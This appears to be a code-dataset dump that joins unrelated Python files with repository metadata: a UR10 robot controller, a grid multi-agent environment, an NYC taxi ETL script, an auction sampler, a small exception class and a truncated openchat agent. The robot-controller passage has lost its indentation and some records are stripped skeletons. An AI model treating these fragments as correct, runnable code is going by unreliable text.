self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def move_joints_with_grasp_constraints(self, joints_vec, dist_pivot,grasp_pivot,constant_axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
# print(pivot_curr)
S1.set_joints(joints_vec)
S1.tcp_vec = copy(S1.joints2pose())
pivot_new,unit_vector = copy(S1.grasp_position_endaxis(dist_pivot,grasp_pivot,constant_axis))
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
# print(S1.position_along_endaxis(dist_pivot))
return new_xyzR
def circular_pivot_motion(self, angle, dist_pivot,axis):
self.read_joints()
# time.sleep(0.5)
self.read_xyz()
S1 = ur10_simulator()
S1.set_joints(self.joints)
S1.tcp_vec = S1.joints2pose()
S1.set_tcp(self.xyzR)
pivot_curr,unit_vector = copy(S1.position_along_endaxis(dist_pivot))
pivot_new = S1.circular_motion(dist_pivot,angle,axis)
xyz_shift = pivot_curr[0:3] - pivot_new[0:3]
new_xyzR = copy(S1.tcp_vec)
new_xyzR[0:3] = np.add(S1.tcp_vec[0:3],xyz_shift)
S1.tcp_vec = copy(new_xyzR)
return new_xyzR
def do_circular_pivot_motion(self, angle, dist_pivot,axis,t,correction):
Sim = ur10_simulator()
self.read_joints()
wrist1 = copy(self.joints[5])
print("Wrist_old",wrist1)
Sim.set_joints(self.joints)
useless = copy(Sim.joints2pose())
new_xyzR = self.circular_pivot_motion(angle,dist_pivot,axis)
self.movej(new_xyzR,t)
time.sleep(t + 0.2)
self.read_joints()
newjoints = copy(self.joints)
# newjoints[5] = wrist1+correction
newjoints[5] = newjoints[5] + correction
self.movejoint(np.deg2rad(newjoints),2)
time.sleep(2.1)
self.read_joints()
print("Wrist_new",self.joints[5])
#-------------------------------------------------------------------------------
#class for managing UR10 poses and
class URPoseManager():
def __init__(self):
#PROPERTY FOR MANAGING POSES (POSITIONS OR JOINTS)
self.dictKeys = list() #list containing the names of positions/joints
self.dictPosJoints = dict() #dictionary
self.dictRelativePos = dict() #dictionary for relative positions
#MANAGING POSES (POSITIONS OR JOINTS)
#save pose file
#filename should contain the full path for the file
def save(self,filename):
#open the file stream
f = open(filename,'w')
#loop through all the keys
for k in range(len(self.dictKeys)):
key = self.dictKeys[k]
value = self.dictPosJoints[key]
f.write(key + ' ' + value[0] + ' ')
[f.write(str(v)+' ') for v in value[1]]
f.write('\n')
f.close()
#load pose file
#filename should contain the full path for the file
def load(self,filename):
if os.path.isfile(filename):
with open(filename) as f:
lines = f.readlines()
#clear the current keys
self.dictKeys = list()
#clear the current dictionary
self.dictPosJoints = dict()
#for every line, split the string by new line and spaces
#the actual data will be stored as a list where each position
#will correspond to a position/joint in the file
data = [l.split('\n')[0].split(' ') for l in lines]
#save all the dictionary keys
self.dictKeys = [str(d[0]) for d in data]
#update the dictionary
#loop through all the keys
for k in range(len(self.dictKeys)):
print('loop')
posevec = [float(x) for x in data[k][2:8]]
value = [data[k][1],posevec]
self.dictPosJoints[self.dictKeys[k]] = value
#print(self.dictKeys) #debugging
#print(self.dictPosJoints) #debugging
            return True #successfully managed to load the file
else:
return False #could not find the file
#move the UR robot to the specified pose
def moveUR(self,urobj,name,time):
if name in self.dictKeys and name in self.dictPosJoints and isinstance(urobj,UR10Controller):
if self.dictPosJoints[name][0] == 'p':
urobj.movej(self.dictPosJoints[name][1],time)
elif self.dictPosJoints[name][0] == 'j':
urobj.movejoint(self.dictPosJoints[name][1],time)
return True
else:
return False
#get pose names
def getPoseNames(self):
return copy(self.dictKeys)
#get the joint position
def getPosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
return copy(self.dictPosJoints[name][1])
else:
return False #could not find the name
#adding a new position
#WARNING: Adding a new position with the same name will overwrite any
#previous entry
#WARNING: position should be in m!!
#WARNING: joints should be in radians!!
def addPosition(self,name,position):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['p',position]
return True
#adding a new joint
#WARNING: Adding a new joint with the same name will overwrite any
#previous entry
#WARNING: joints should be in radians!!
def addJoint(self,name,joint):
if not name in self.dictKeys:
self.dictKeys.append(name)
self.dictPosJoints[name] = ['j',joint]
return True
#removing a position/joint
def removePosJoint(self,name):
if name in self.dictKeys and name in self.dictPosJoints:
del(self.dictKeys[self.dictKeys.index(name)])
del(self.dictPosJoints[name])
return True
else:
return False
#this function remaps all the positions that have been saved to a new
#home position. necessary when remapping has changed. as long as it is
#possible to create positions relative to an origin or home position, this
#method can be used to convert all the stored positions to new values
#based on a new origin
#def conv2newHome(self,_home):
# print('ok')
#-------------------------------------------------------------------------------
if __name__ == '__main__':
port = 30003
ip1 = '10.1.1.6'
# ip2 = '10.1.1.6'
import os,sys
sys.path.append('../iLimb')
from iLimb import *
buffer_size = 1024
U1 = UR10Controller(ip1)
# U2 = UR10Controller(ip2)
# U1.read_joints()
# print(U1.joints)
# U1.read_joints()
# Sim = ur10_simulator()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# print(U1.xyzR)
# new_joints = copy(U1.joints)
mult = 1
Sim = ur10_simulator()
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(40, 190,"z",3,-20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,20)
# time.sleep(3)
U1.do_circular_pivot_motion(-40, 190,"z",3,-20)
# time.sleep(3)
# for i in range(100):
# t1 = time.time()
# # U1.read_joints()
# U1.read_xyz()
# print(time.time() - t1)
# print(U1.joints)
# # time.sleep(5)
# print(U1.xyzR)
#rpy_change = np.deg2rad([0, -10, 0])
# l = iLimbController('COM16')
# l.connect()
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
angle = -10
dist_pivot = 220
grasp_pivot = 25
# #open the fingers
# for i in range(6):
# #new_xyzR = U1.move_rpy_with_constraints(rpy_change, 175)
# #U1.movej(new_xyzR,2)
# # l.control(['thumb','index','middle'],['position']*3,[140,120,120])
# U1.read_joints()
# Sim.set_joints(U1.joints)
# U1.xyzR = Sim.joints2pose()
# old_xyzR = copy(U1.xyzR)
# print(U1.xyzR)
# new_joints = copy(U1.joints)
# new_joints[4] = new_joints[4] + angle
# new_xyzR = U1.move_joints_with_grasp_constraints(new_joints,dist_pivot,grasp_pivot,"z")
# U1.movej(new_xyzR,3)
# time.sleep(3.2)
#close the fingers
# #Bimanual
# l.control(['thumb','index','middle'],['open']*3,[290]*3)
# time.sleep(1)
# U1.movej(old_xyzR,3)
# print(mult, new_joints)
# old_XYZ = copy(U1.xyzR)
# # U2.read_xyz()
# print(U1.xyzR)
# print(old_XYZ)
# # Sim.tcp_vec = U1.xyzR
# mult = 1
# seconds = 2
# for i in range(100):
# Sim.tcp_vec = Sim.position_along_endaxis(-30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# Sim.tcp_vec = Sim.position_along_endaxis(30)
# U1.movej(Sim.tcp_vec,seconds)
# time.sleep(seconds)
# print(Sim.tcp_vec)
# # print(U2.xyzR)
# mult = 1
# for i in range(100):
# U1.xyzR[0] = U1.xyzR[0] + (20*mult)
# # U2.xyzR[0] = U2.xyzR[0] + (20*mult)
# U1.movej(U1.xyzR,1)
# # pause(0.05)
# # U2.movej(U2.xyzR,0.4)
# time.sleep(1)
# mult = mult*(-1)
# print("Joints from port", U.joints)
# Sim.set_joints(U.joints)
# Sim.tcp_vec = Sim.joints2pose()
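# A minimal usage sketch for URPoseManager, assuming a reachable UR10
# controller at the given IP; the pose/joint values and the file path below are
# illustrative placeholders only.
def example_pose_manager():
    mgr = URPoseManager()
    mgr.addPosition('home', [400.0, -200.0, 300.0, 0.0, 3.14, 0.0])
    mgr.addJoint('tucked', [0.0, -1.57, 1.57, 0.0, 1.57, 0.0])
    mgr.save('poses.txt')         # persist name/type/values, one pose per line
    mgr.load('poses.txt')
    ur = UR10Controller('10.1.1.6')
    mgr.moveUR(ur, 'home', 5)     # move to the named pose over 5 seconds
    return mgr.getPoseNames()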
| 11,431
| 1
| 776
|
072d2914c7508a4a27885c88e7923aafdfe723a6
| 4,133
|
py
|
Python
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | 2
|
2020-02-05T04:17:03.000Z
|
2021-05-24T04:07:36.000Z
|
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
src/rlmamr/my_env/capture_target_MA_core.py
|
yuchen-x/CoRL2019
|
d482a90441bc8eb0461f1f22fbd65d96584f6914
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
"""A base class of an agent whose movement path is generated by using astar alg"""
############################################################################
# helper functions
    @staticmethod
    def rand_position(x_range, y_range):
        return np.array([np.random.randint(x_range), np.random.randint(y_range)])
class Agent_v1(Agent):
"""Move_To_Target macro-action is terminated by reaching the goal.
The low level controller automatically set the latest
obvserved tagrget's position as the goal. If the target is flicked, the
previous target's location is continuely implemented."""
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
            # the target is flickered, so move towards the target position from the previous observation
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
| 33.064
| 140
| 0.581176
|
#!/usr/bin/python
import numpy as np
import IPython
from IPython.core.debugger import set_trace
NORTH = np.array([0, 1])
SOUTH = np.array([0, -1])
WEST = np.array([-1, 0])
EAST = np.array([1, 0])
STAY = np.array([0, 0])
TRANSLATION_TABLE = [
# [left, intended_direction, right]
[WEST, NORTH, EAST],
[EAST, SOUTH, WEST],
[SOUTH, WEST, NORTH],
[NORTH, EAST, SOUTH],
[STAY, STAY, STAY]
]
DIRECTION = np.array([[0.0, 1.0],
[0.0, -1.0],
[-1.0, 0.0],
[1.0, 0.0],
[0.0, 0.0]])
class Agent(object):
"""A base class of an agent whose movement path is generated by using astar alg"""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
self.idx = idx
self.grid_dim = grid_dim
self.x_len, self.y_len = self.grid_dim
self.position = self.rand_position(*self.grid_dim)
self.agt_trans_noise = agent_trans_noise
self.cur_action = None
self.cur_action_time_left = 0.0
self.cur_action_done = True
def step(self, action, goal):
raise NotImplementedError
def astar_move(self, goal):
moves = self.wrap_positions(DIRECTION + self.position)
h = np.linalg.norm(goal-moves, axis=1)
dest_idx = np.random.choice(np.where(h == h.min())[0], size=1)[0]
trans = TRANSLATION_TABLE[dest_idx][np.random.choice(3, p=[self.agt_trans_noise/2, 1-self.agt_trans_noise, self.agt_trans_noise/2])]
self.position = (self.position+trans) % self.x_len
dist = np.linalg.norm(goal - self.position)
if dist < 0.1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
############################################################################
# helper functions
def _get_position_from_one_hot(self, goal):
index = goal.nonzero()[0]
X = index % self.x_len
Y = index // self.x_len
return np.concatenate([X,Y])
def _get_position_from_normalized(self, goal):
if all(goal[2:] == -1):
return goal[2:]
else:
return goal[2:] * self.x_len
@staticmethod
def rand_position(x_range, y_range):
return np.array([np.random.randint(x_range), np.random.randint(y_range)])
def wrap_positions(self, positions):
X, Y = np.split(positions,2,axis=1)
return np.concatenate([X%self.x_len, Y%self.y_len], axis=1)
class Agent_v1(Agent):
"""Move_To_Target macro-action is terminated by reaching the goal.
The low level controller automatically set the latest
obvserved tagrget's position as the goal. If the target is flicked, the
previous target's location is continuely implemented."""
def __init__(self, idx, grid_dim, agent_trans_noise=0.1):
super(Agent_v1, self).__init__(idx, grid_dim, agent_trans_noise=agent_trans_noise)
self.pre_goal = np.array([-1,-1])
def step(self, action, goal):
"""Depends on the input macro-action to run low-level controller to achieve
primitive action execution.
"""
if self.cur_action_done:
self.cur_action = action
else:
action = self.cur_action
self.cur_action_done = False
self.cur_action_time_left = -1.0
if action == 1:
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
if len(goal) > len(self.grid_dim) * 2:
goal = self._get_position_from_one_hot(goal[self.x_len*self.y_len:])
else:
goal = self._get_position_from_normalized(goal)
            # the target is flickered, so move towards the target position from the previous observation
if all(goal==-1):
if all(self.pre_goal==-1):
self.cur_action_done = True
self.cur_action_time_left = 0.0
else:
self.astar_move(self.pre_goal)
else:
self.astar_move(goal)
self.pre_goal = goal
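A minimal usage sketch of Agent_v1 (illustrative only; the enclosing module name is not stated here, and the 4-element normalized goal vector, the loop length and the non-terminal action value 0 are assumptions inferred from how step() and _get_position_from_normalized() read their inputs):
import numpy as np
agent = Agent_v1(idx=0, grid_dim=(8, 8))
goal = np.array([0.0, 0.0, 0.5, 0.5])    # last two entries: normalized target position
for _ in range(20):
    agent.step(action=0, goal=goal)      # any action other than 1 keeps moving toward the goal
    if agent.cur_action_done:            # set once the agent is within 0.1 of the goal
        break
print(agent.position)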
| 1,637
| 0
| 223
|
87af048da678fa17419acdfe0ee36bfcb3064335
| 4,026
|
py
|
Python
|
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
src/python/packages/study/__main__.py
|
djrlj694/nyc-taxi-analysis
|
0d62cc56594ef9260580c9e6c203e9fbde6fee24
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from study import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesystem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
# -- Data Processing: Extract -- #
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is run as the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 22.617978
| 79
| 0.513164
|
#!/usr/bin/env python3
"""
__main__.py - The main module for processing data and creating visual summaries
for this study.
"""
import os
import sys
from pathlib import Path
import etl
import pandas as pd
import ui.cli as cli
from file import YAMLFile
# =========================================================================== #
# METADATA
# =========================================================================== #
__author__ = 'Robert (Bob) L. Jones'
__credits__ = ['Robert (Bob) L. Jones']
__created_date__ = 'Dec 29, 2020'
__modified_date__ = 'Dec 30, 2020'
# =========================================================================== #
# EXPORTS
# =========================================================================== #
# Define the module's API -- the list of exportable objects (classes,
# functions, etc.) -- when performing a "wild import" (`from study import *`).
__all__ = [
'DEBUG',
]
# =========================================================================== #
# CONSTANTS
# =========================================================================== #
# -- Debugging -- #
DEBUG = bool(os.getenv('DEBUG', default=False))
# -- Filesystem -- #
PREFIX = Path(os.getenv('PREFIX', default='.')).resolve()
DATA_DIR = PREFIX / 'data'
SOURCE_DIR = DATA_DIR / '01_raw'
RESULTS_DIR = PREFIX / 'results'
SOURCE_FILE = '%s_tripdata_%4d-%02d.csv'
# -- URLs -- #
SOURCE_URL = 'https://s3.amazonaws.com/nyc-tlc/trip+data'
# =========================================================================== #
# FUNCTIONS
# =========================================================================== #
# -- Data Analytics -- #
def visualize_data(df: pd.DataFrame):
pass
# Debug data frame.
DEBUG and preview(df, visualize_data.__name__)
# Return data frame for reuse.
return df
# -- Data Processing: Extract -- #
def extract_data(config: dict):
# Define an inner function to extract source data files.
def extract_files(type: str):
source.extract_files(
type,
config[type]['start_date'],
config[type]['end_date'],
)
# Create source.
source = etl.Source(SOURCE_FILE, SOURCE_URL, SOURCE_DIR)
# Extract trip records.
extract_files('yellow') # Yellow Taxi
extract_files('green') # Green Taxi
extract_files('fhv') # For-Hire Vehicle
extract_files('fhvhv') # High Volume For-Hire Vehicle
# -- Data Processing: Transform -- #
# -- Data Processing: Load -- #
# -- Utilities -- #
def percent(num, denom):
return 100 * num / denom
def preview(df: pd.DataFrame, func_name: str):
print(f'INSIDE {func_name}(): type =', type(df).__name__)
print(df.head(5))
def zScore(x, mean, std):
return (x - mean) / std
# -- Main Program -- #
def main():
"""
Runs the main set of functions that define the program.
"""
# Confirm debugging state.
DEBUG and print('DEBUG =', DEBUG)
# Confirm Python path.
DEBUG and print('sys.path =', sys.path)
# Print constants.
DEBUG and print('PREFIX =', PREFIX)
# Print CLI option values.
DEBUG and print('args.config =', args.config) # Ex: etc/settings/etl.cfg
# Read a configuration file.
cfg = YAMLFile(args.config).load()
DEBUG and print('cfg =', cfg)
DEBUG and print('type(cfg) =', type(cfg))
# Create a mini configuration dictionary.
sources_cfg = cfg['sources']
extract_data(sources_cfg)
# df = extract_data()
# df = transform_data(df)
# visualize_data(df)
# =========================================================================== #
# MAIN EXECUTION
# =========================================================================== #
# -- CLI option processing -- #
args = cli.read_args()
# -- Main Program -- #
# If this module is run as the main module, call the main() function.
if __name__ == '__main__':
main()
# -- Housekeeping -- #
# Exit the program normally (i.e., with a POSIX exit code of 0).
sys.exit(0)
| 871
| 0
| 115
|
dcfb93be50b868f85e2e53dee2d5dd941c95ec50
| 4,100
|
py
|
Python
|
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
ssa_sim_v2/simulator/modules/auction_attributes/auction_attributes_base_module.py
|
donghun2018/adclick-simulator-v2
|
ade886e9dcbde9fcea218a19f0130cc09f81e55e
|
[
"MIT"
] | null | null | null |
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
Base class for all click probability modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
        # np.random.choice requires a 1-D array of items and rejects tuple keys ('a must be 1-dimensional'),
        # so the tuple keys are converted to strings, the random choice is made over the string versions,
        # and the resulting counts are mapped back to the original tuple keys in the final dict.
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
| 33.606557
| 152
| 0.596098
|
# Fix paths for imports to work in unit tests ----------------
if __name__ == "__main__":
from _fix_paths import fix_paths
fix_paths()
# ------------------------------------------------------------
# Load libraries ---------------------------------------------
from typing import Dict
import numpy as np
from collections import namedtuple
from ssa_sim_v2.simulator.modules.simulator_module import SimulatorModule
# ------------------------------------------------------------
class AuctionAttributesModule(SimulatorModule):
"""
Base class for all click probability modules with segments.
:ivar np.random.RandomState rng: Random number generator.
:ivar dict prior: Dict with constant probabilities for every segment.
"""
Params = namedtuple('Params', ['p'])
"""
:param float p: Probability of selecting a user from a segment.
"""
def __init__(self, prior={(0,): Params(p=5)}, seed=9):
"""
:param dict prior: Dict with constant probabilities for every segment.
:param int seed: Seed for the random number generator.
"""
super().__init__(prior, seed)
self.prior = dict()
# Normalize prior and store in self.priors
total_p_values = 0
for key in prior.keys():
total_p_values += prior[key].p
for key in prior.keys():
self.prior[key] = AuctionAttributesModule.Params(p=prior[key].p / total_p_values)
self.rng = np.random.RandomState(seed)
def get_auction_attributes(self, n):
"""
Method that returns a dict of number of times each segment has been selected.
:param int n: Number of auctions for which to sample attributes.
:return: Dict of number of times each segment was present in n auctions.
:rtype: Dict[tuple, int]
"""
        # np.random.choice requires a 1-D array of items and rejects tuple keys ('a must be 1-dimensional'),
        # so the tuple keys are converted to strings, the random choice is made over the string versions,
        # and the resulting counts are mapped back to the original tuple keys in the final dict.
keys_dict = dict()
for key in self.prior.keys():
keys_dict[str(key)] = key
keys = list(self.prior)
keys = [str(key) for key in keys]
probabilities = [self.prior[keys_dict[key]].p for key in keys]
choices = self.rng.choice(a=keys, p=probabilities, size=n)
unique, counts = np.unique(choices, return_counts=True)
choices_dict_str = dict(zip(unique, counts))
for key in keys:
if key in choices_dict_str.keys():
pass
else:
choices_dict_str[key] = 0
choices_dict = dict()
for key in self.prior.keys():
choices_dict[key] = choices_dict_str[str(key)]
return choices_dict
if __name__ == "__main__":
import unittest
class TestAuctionsAttributes(unittest.TestCase):
def test_sanity(self):
Params = AuctionAttributesModule.Params
attributes_model = AuctionAttributesModule(
prior={
(0, 0): Params(p=45),
(0, 1): Params(p=25),
(1, 0): Params(p=235),
(1, 1): Params(p=76)},
seed=1234
)
number_of_auctions = [100, 1000, 10000, 15000, 50000, 150000, 300000, 500000]
for num in number_of_auctions:
choices_dict = attributes_model.get_auction_attributes(n=num)
#print(f'Throughout {num} auctions that were run, following segments were selected following number of times: {choices_dict}')
                print('Throughout {} auctions that were run, following segments were selected following number of times: {}'.format(num, choices_dict))
self.assertTrue(True)
print("")
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestAuctionsAttributes))
unittest.TextTestRunner().run(suite)
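A quick check of the prior normalization performed in __init__ above (not from the repository; the construction mirrors the unit test): the p values are rescaled to sum to 1 before any sampling, and get_auction_attributes returns per-segment counts that add up to n.
Params = AuctionAttributesModule.Params
m = AuctionAttributesModule(prior={(0,): Params(p=3), (1,): Params(p=1)}, seed=0)
print(m.prior)                        # {(0,): Params(p=0.75), (1,): Params(p=0.25)}
counts = m.get_auction_attributes(n=1000)
print(sum(counts.values()))           # 1000 -- every auction is assigned to exactly one segment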
| 912
| 27
| 57
|
348061fbd3722432b2a2937544c82aef93786355
| 232
|
py
|
Python
|
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
src/cloudio/exception/invalid_cloudio_attribute_type_exception.py
|
michaelFavre/cloudio-endpoint-python
|
c00f7cc0578d1974d47fbab5a97a3239fcb99084
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
| 46.4
| 122
| 0.732759
|
# -*- coding: utf-8 -*-
class InvalidCloudioAttributeTypeException(Exception):
def __init__(self, type):
super(InvalidCloudioAttributeTypeException, self).__init__(str(type) + ' is not a valid cloud.io attribute type!')
| 127
| 33
| 49
|
603e4e67758efe34205d8f7d4feea0a544dec0f7
| 3,871
|
py
|
Python
|
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | 8
|
2021-03-12T05:30:22.000Z
|
2022-01-26T09:36:40.000Z
|
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | null | null | null |
openchat/agents/unlikelihood.py
|
mgorkove/openchat
|
6dbf289e510e5adc10d98d30fcbf2338b8290eef
|
[
"Apache-2.0"
] | 3
|
2021-09-23T02:33:11.000Z
|
2022-01-18T18:59:18.000Z
|
import importlib
from parlai.core.agents import add_datapath_and_model_args
from parlai.core.build_data import modelzoo_path
from openchat.utils import (
inherit,
create_agent_from_opt_file_and_model_class,
)
from openchat.base import (
ParlaiGenerationAgent,
Seq2SeqLM,
ConvAI2Agent,
WizardOfWikipediaAgent,
)
| 33.66087
| 65
| 0.61302
|
import importlib
from parlai.core.agents import add_datapath_and_model_args
from parlai.core.build_data import modelzoo_path
from openchat.utils import (
inherit,
create_agent_from_opt_file_and_model_class,
)
from openchat.base import (
ParlaiGenerationAgent,
Seq2SeqLM,
ConvAI2Agent,
WizardOfWikipediaAgent,
)
class UnlikelihoodAgent(ParlaiGenerationAgent, Seq2SeqLM):
def __init__(self, model, device, maxlen=-1):
self.check_agent(model)
maxlen = maxlen if maxlen > 0 else self.default_maxlen()
if "wizard_of_wikipedia.context_and_label" in model:
name = "rep_wiki_ctxt_and_label"
elif "wizard_of_wikipedia.context" in model:
name = "rep_wiki_ctxt"
elif "wizard_of_wikipedia.label" in model:
name = "rep_label_ctxt"
elif "convai2.context_and_label" in model:
name = "rep_convai2_ctxt_and_label"
elif "convai2.context" in model:
name = "rep_convai2_ctxt"
elif "convai2.label" in model:
name = "rep_convai2_label"
elif "convai2.vocab.alpha.1e-0" in model:
name = "vocab_alpha1e0"
elif "convai2.vocab.alpha.1e-1" in model:
